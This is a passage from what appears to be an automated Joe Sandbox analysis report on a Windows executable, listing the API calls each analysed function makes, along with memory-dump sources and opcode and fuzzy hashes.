                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001A4E44
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001A4E7A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: cfea15f922666c8430c4bf1106abcc88f2fc93fbd44f98dcc121b06eae26d653
                                                                                                                              • Instruction ID: aa189e2fd06fdbdbaefc5785c3b4b7834a54d9513675ced0c279691464694eaf
                                                                                                                              • Opcode Fuzzy Hash: cfea15f922666c8430c4bf1106abcc88f2fc93fbd44f98dcc121b06eae26d653
                                                                                                                              • Instruction Fuzzy Hash: 5331B339600256AFDF21DF74CC45BBA7BA6FF82310F154528E861871A1E7B4DC91DB90
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 001D7AB6
                                                                                                                                • Part of subcall function 001B69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B69E3
                                                                                                                                • Part of subcall function 001B69C9: GetCurrentThreadId.KERNEL32 ref: 001B69EA
                                                                                                                                • Part of subcall function 001B69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B69F1
                                                                                                                              • GetCaretPos.USER32(?), ref: 001D7AC7
                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 001D7B00
                                                                                                                              • GetForegroundWindow.USER32 ref: 001D7B06
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2759813231-0
                                                                                                                              • Opcode ID: 772ca83ecaba4caeb2b5693d182e76889597c6a49e3f3c060edb2a7d3ace3931
                                                                                                                              • Instruction ID: 9376bc46a2719b48b288e0e4ab1efed5196c5ff99a818a6e18dfba661580a2af
                                                                                                                              • Opcode Fuzzy Hash: 772ca83ecaba4caeb2b5693d182e76889597c6a49e3f3c060edb2a7d3ace3931
                                                                                                                              • Instruction Fuzzy Hash: 0D31EF71D00108AFCB01EFB5D8859EFBBF9EF68314B10806AE915E7211E7359E05CBA0
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001C49B7
                                                                                                                                • Part of subcall function 001C4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001C4A60
                                                                                                                                • Part of subcall function 001C4A41: InternetCloseHandle.WININET(00000000), ref: 001C4AFD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1463438336-0
                                                                                                                              • Opcode ID: bbf9e4772127d9db3c384822706a9bd09f80916e8f2a024f46ebb7077a86f08b
                                                                                                                              • Instruction ID: a907809cb61e1cacca0b00b2c3342f7bae75276be1b705da00686d3de6e5248d
                                                                                                                              • Opcode Fuzzy Hash: bbf9e4772127d9db3c384822706a9bd09f80916e8f2a024f46ebb7077a86f08b
                                                                                                                              • Instruction Fuzzy Hash: 90212631244611BFDB159F60DC11FBBBBAAFF68710F10400EFA0687550EB71E810A794
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001ABCD9
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001ABCE0
                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 001ABCFA
                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001ABD29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2621361867-0
                                                                                                                              • Opcode ID: 8e21ed27e91bb0bcbcc2773096554e2d96cb57c63ced404b333800c782a75b52
                                                                                                                              • Instruction ID: 8b61f4d5df05c2d34d90a71267fd4bdb1a885ba1cd1f8447adf38c34944e14f8
                                                                                                                              • Opcode Fuzzy Hash: 8e21ed27e91bb0bcbcc2773096554e2d96cb57c63ced404b333800c782a75b52
                                                                                                                              • Instruction Fuzzy Hash: 14216F76105249ABDF019FA8ED89FFE7BAAEF06318F044014FA01A6161C776CD61EB60
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 001D88A3
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D88BD
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D88CB
                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001D88D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2169480361-0
                                                                                                                              • Opcode ID: 41b92074aa24321b63fee27d849ddc602b5129d7649544ee859a1853425affc2
                                                                                                                              • Instruction ID: 41bac00451a9fcfb0adc9be06e4e558f68be9b8f5b55378dc2b58fb13854d0eb
                                                                                                                              • Opcode Fuzzy Hash: 41b92074aa24321b63fee27d849ddc602b5129d7649544ee859a1853425affc2
                                                                                                                              • Instruction Fuzzy Hash: 15118B31245114AFDB14AB28DC19FBA7BAAEF95320F14811AF91AD73E1CB74AC40DB90
                                                                                                                              APIs
                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 001C906D
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 001C907F
                                                                                                                              • accept.WS2_32(00000000,00000000,00000000), ref: 001C908C
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C90A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 385091864-0
                                                                                                                              • Opcode ID: 62ab37edde529daecf2041fc81d101afe7f8effaa05acb338850a0501cccb5c7
                                                                                                                              • Instruction ID: ffcfdb932dcd23fc8d716bf140e9200812d442b865d1a7a902c387283c7b45f5
                                                                                                                              • Opcode Fuzzy Hash: 62ab37edde529daecf2041fc81d101afe7f8effaa05acb338850a0501cccb5c7
                                                                                                                              • Instruction Fuzzy Hash: 652142719001249FC7119F69D885AEEBBFCEF59714F00816AF849D7290DB74DA81CF90
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?), ref: 001B2CB9
                                                                                                                                • Part of subcall function 001B2CAA: lstrcpyW.KERNEL32(00000000,?,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B2CDF
                                                                                                                                • Part of subcall function 001B2CAA: lstrcmpiW.KERNEL32(00000000,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?), ref: 001B2D10
                                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B1916
                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B193C
                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B1970
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                              • String ID: cdecl
                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                              • Opcode ID: 11e355158ff79459d94e6447f19751dcc8efb0755bf9e710e1a04ae1db3f98b4
                                                                                                                              • Instruction ID: 3ff18ebb3af50ea1a7df9066fc4c9dc846a82e4c61b634a1d586d9150ac39e69
                                                                                                                              • Opcode Fuzzy Hash: 11e355158ff79459d94e6447f19751dcc8efb0755bf9e710e1a04ae1db3f98b4
                                                                                                                              • Instruction Fuzzy Hash: 2B11D036200342FFDB15AF74D865DBA77B9FF49350B81802AF806CB260EB319951C7A1
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 001A3D65
                                                                                                                                • Part of subcall function 001945EC: __FF_MSGBANNER.LIBCMT ref: 00194603
                                                                                                                                • Part of subcall function 001945EC: __NMSG_WRITE.LIBCMT ref: 0019460A
                                                                                                                                • Part of subcall function 001945EC: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 614378929-0
                                                                                                                              • Opcode ID: 528e9e2fa4165bcb4b4a3788d8f53ae7fc589eb08950280f219f7599a8461dc8
                                                                                                                              • Instruction ID: 611b752840bda9f77833177189debf8a964dbe59fae3fba8aed24ca540c7153c
                                                                                                                              • Opcode Fuzzy Hash: 528e9e2fa4165bcb4b4a3788d8f53ae7fc589eb08950280f219f7599a8461dc8
                                                                                                                              • Instruction Fuzzy Hash: E411293A800211EBDF353FF0BC447AA3B98BF12360FA14425F9588A591DF30CA80C660
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001B715C
                                                                                                                              • _memset.LIBCMT ref: 001B717D
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001B71CF
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001B71D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1157408455-0
                                                                                                                              • Opcode ID: 0a71f2fb030aafad851ef2a01130e7b7043b4f34f75071e1256f1e4de9f67672
                                                                                                                              • Instruction ID: 22c776995ca42bbfa374f4fca696f1d6bb63b56b6e455ea99510854cc6fcc202
                                                                                                                              • Opcode Fuzzy Hash: 0a71f2fb030aafad851ef2a01130e7b7043b4f34f75071e1256f1e4de9f67672
                                                                                                                              • Instruction Fuzzy Hash: 3011A7719052287AD7205B69AC4DFEBBA7CEF45764F10419AF504E71D0D7744E80CBB4
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001B13EE
                                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001B1409
                                                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001B141F
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 001B1474
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3137044355-0
                                                                                                                              • Opcode ID: 1884b33e4de08c84ce8f23a606771f4ff93dc2fd1092153f8fdccd7874f4d7a4
                                                                                                                              • Instruction ID: dac1d96d66dbb229318909665ba376a045342d25d9cea145d7fa8e6123eeef0c
                                                                                                                              • Opcode Fuzzy Hash: 1884b33e4de08c84ce8f23a606771f4ff93dc2fd1092153f8fdccd7874f4d7a4
                                                                                                                              • Instruction Fuzzy Hash: 8B217F71500209FBDB20DF91EC98AEBBBB8EF00744F8184A9EA5297550D774EA44DF51
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001AC285
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC297
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC2AD
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC2C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 38055dfa841138dbaded538d3611ee5ca06745fa0e22ee221a4b3c19f5479b0d
                                                                                                                              • Instruction ID: ea97e1a63131aa38abd9c187d02c633ef085b627ab553700bfc635be48bb6a91
                                                                                                                              • Opcode Fuzzy Hash: 38055dfa841138dbaded538d3611ee5ca06745fa0e22ee221a4b3c19f5479b0d
                                                                                                                              • Instruction Fuzzy Hash: A711187A940218FFEB11DBD8C885F9DBBB4FB09710F204092EA04B7294D771AE10DB94
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001B7C6C
                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 001B7C9F
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001B7CB5
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001B7CBC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2880819207-0
                                                                                                                              • Opcode ID: 36e8b87a313de1e779457c4ed2953d64e367eee8e158ee13bdbdb3536edc1bca
                                                                                                                              • Instruction ID: 0720327970780b58555c7795038ef0ce18439db459495242291b3da12769e1a0
                                                                                                                              • Opcode Fuzzy Hash: 36e8b87a313de1e779457c4ed2953d64e367eee8e158ee13bdbdb3536edc1bca
                                                                                                                              • Instruction Fuzzy Hash: A011C872A08244BBD712DF6CAC08AEA7FAE9B44324F14425AF515D3291D7708A54C7A1
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3970641297-0
                                                                                                                              • Opcode ID: d93c74f9160c847ef1cb74b632b74da5660a229600565c3e6b1171976d571c18
                                                                                                                              • Instruction ID: fefb8c8de9611150cfc47d212c07a99e326d3623323991bafcc715a7a0684453
                                                                                                                              • Opcode Fuzzy Hash: d93c74f9160c847ef1cb74b632b74da5660a229600565c3e6b1171976d571c18
                                                                                                                              • Instruction Fuzzy Hash: 211161B2501549BFDB115FA0AC44EFA7B6AEF09364F154225FA0456150E731DD60DFA0
                                                                                                                              APIs
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001B49EE
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 001B4A13
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001B4A1D
                                                                                                                              • Sleep.KERNEL32(?), ref: 001B4A50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
